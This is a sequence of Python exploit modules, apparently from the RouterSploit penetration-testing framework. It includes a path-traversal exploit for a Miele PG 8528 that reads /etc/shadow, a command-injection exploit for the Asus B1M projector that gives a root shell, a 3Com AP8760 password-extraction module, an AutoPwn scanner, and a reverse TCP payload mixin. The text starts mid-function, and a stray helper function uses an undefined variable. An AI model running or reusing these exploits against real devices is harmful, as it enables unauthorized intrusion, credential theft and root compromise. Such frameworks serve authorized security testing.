vulnerable # unauthorized if response.status_code == 401: url = sanitize_url("{}:{}/BRS_netgear_success.html".format( self.target, self.port)) response = http_request(method="GET", url=url) if response is None: return False # target is not vulnerable # authorized if response.status_code == 200: return True # target is vulnerable return False # target not vulnerable
class Exploit(exploits.Exploit): """ Exploit implementation for Miele Professional PG 8528 Path Traversal vulnerability. If the target is vulnerable, content of the specified file is returned. """ __info__ = { 'name': 'Miele Professional PG 8528 Path Traversal', 'description': 'Module exploits Miele Professional PG 8528 Path Traversal vulnerability which allows ' 'to read any file on the system.', 'authors': [ 'Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG', # vulnerability discovery 'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module ], 'references': [ 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7240', 'https://www.exploit-db.com/exploits/41718/', ], 'devices': ['Miele Professional PG 8528 PST10'], } target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) port = exploits.Option(80, 'Target Port') filename = exploits.Option('/etc/shadow', 'File to read') def run(self): if self.check(): url = "{}:{}/../../../../../../../../../../../..{}".format( self.target, self.port, self.filename) response = http_request(method="GET", url=url) if response is None: return if response.status_code == 200 and response.text: print_success("Success! File: %s" % self.filename) print_info(response.text) else: print_error("Exploit failed") else: print_error("Device seems to be not vulnerable") @mute def check(self): url = "{}:{}/../../../../../../../../../../../../etc/shadow".format( self.target, self.port) response = http_request(method="GET", url=url) if response is not None and "root:" in response.text: return True # target vulnerable return False # target is not vulnerable
class Exploit(exploits.Exploit): """ Exploit implementation for Asus B1M Projector Remote Code Execution vulnerability. If the target is vulnerable, command loop is invoked that allows executing commands with root privileges. """ __info__ = { 'name': 'Asus B1M Projector RCE', 'description': 'Module exploits Asus B1M Projector Remote Code Execution vulnerability which ' 'allows executing command on operating system level with root privileges.', 'authors': [ 'Hacker House <www.myhackerhouse.com>', # vulnerability discovery 'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module ], 'references': [ 'https://www.myhackerhouse.com/asus-b1m-projector-remote-root-0day/', ], 'devices': [ 'Asus B1M Projector', ], } target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) port = exploits.Option(80, 'Target Port', validators=validators.integer) def run(self): if self.check(): print_success("Target is vulnerable") print_status("Invoking command loop...") shell(self, architecture="mips") else: print_error("Target is not vulnerable") def execute(self, cmd): """ callback used by shell functionality """ url = "{}:{}/cgi-bin/apply.cgi?ssid=\"%20\"`{}`".format( self.target, self.port, cmd) response = http_request(method="GET", url=url) if response is None: return "" return response.text @mute def check(self): cmd = "cat /etc/shadow" response_text = self.execute(cmd) if "root:" in response_text: return True # target is vulnerable return False # target is not vulnerable
class Exploit(exploits.Exploit): """ Scanner implementation for all vulnerabilities. """ __info__ = { 'name': 'AutoPwn', 'description': 'Scanner module for all vulnerabilities.', 'author': [ 'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module ], } target = exploits.Option('', 'Target IP address e.g. 192.168.1.1') # target address port = exploits.Option(80, 'Target port') # default port def run(self): rootpath = 'routersploit/modules/' path = 'exploits' modules = [] for device in listdir(rootpath+path): # TODO refactor this, using load_modules() from core if not device.endswith(".py") and not device.endswith(".pyc"): for f in listdir(rootpath+path + "/" + device): if f.endswith(".py") and f != "__init__.py": modules.append(device + "/" + f[:-3]) vulnerabilities = [] for module_name in modules: f = "".join((path, "/", module_name)) module = imp.load_source('module', rootpath + f + '.py') exploit = module.Exploit() exploit.target = self.target exploit.port = self.port response = exploit.check() if response is True: print_success("{} is vulnerable".format(f)) vulnerabilities.append(f) elif response is False: print_error("{} is not vulnerable".format(f)) else: print_status("{} could not be verified".format(f)) if vulnerabilities: print print_success("Device is vulnerable!") for v in vulnerabilities: print_info(" - {}".format(v)) else: print_error("Device is not vulnerable to any exploits!\n") def check(self): print_error("Check method is not available")
class Exploit(exploits.Exploit): """ Exploit implementation for 3Com AP8760 Password Disclosure vulnerability. If the target is vulnerable it is possible to fetch credentials for administration user. """ __info__ = { 'name': '3Com AP8760 Password Disclosure', 'description': 'Exploits 3Com AP8760 password disclosure vulnerability.' 'If the target is vulnerable it is possible to fetch credentials for administration user.', 'authors': [ 'Richard Brain', # vulnerability discovery 'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module ], 'references': [ 'http://www.procheckup.com/procheckup-labs/pr07-40/', ], 'devices': [ '3Com AP8760', ], } target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address port = exploits.Option(80, 'Target port') # default port def run(self): creds = [] url = "{}:{}/s_brief.htm".format(self.target, self.port) print_status("Sending payload request") response = http_request(method="GET", url=url) if response is None: return print_status("Extracting credentials") username = re.findall('<input type="text" name="szUsername" size=16 value="(.+?)">', response.text) password = re.findall('<input type="password" name="szPassword" size=16 maxlength="16" value="(.+?)">', response.text) if len(username) and len(password): print_success("Exploit success") creds.append((username[0], password[0])) print_table(("Login", "Password"), *creds) else: print_error("Exploit failed - could not extract credentials") @mute def check(self): url = "{}:{}/s_brief.htm".format(self.target, self.port) response = http_request(method="GET", url=url) if response is None: return False # target is not vulnerable if "szUsername" in response.text and "szPassword" in response.text: return True # target is vulnerable return False # target not vulnerable
def line_feed_queue(results): port_list = [80, 443, 8080, 81, 4567, 9999, 22, 23, 25, 53] for ip in results: target = exploits.Option(str(ip)) for port in list_of_ports: port = exploits.Option(str(port)) threads = exploits.Option(int(8)) # open_display_thread() operate_wait_and_hold_generate_py_script(target, port, threads) return
class ReverseTCPPayloadMixin(object): __metaclass__ = exploits.ExploitOptionsAggregator handler = PayloadHandlers.REVERSE_TCP lhost = exploits.Option('', 'Connect-back IP address', validators=validators.ipv4) lport = exploits.Option(5555, 'Connect-back TCP Port', validators=validators.integer)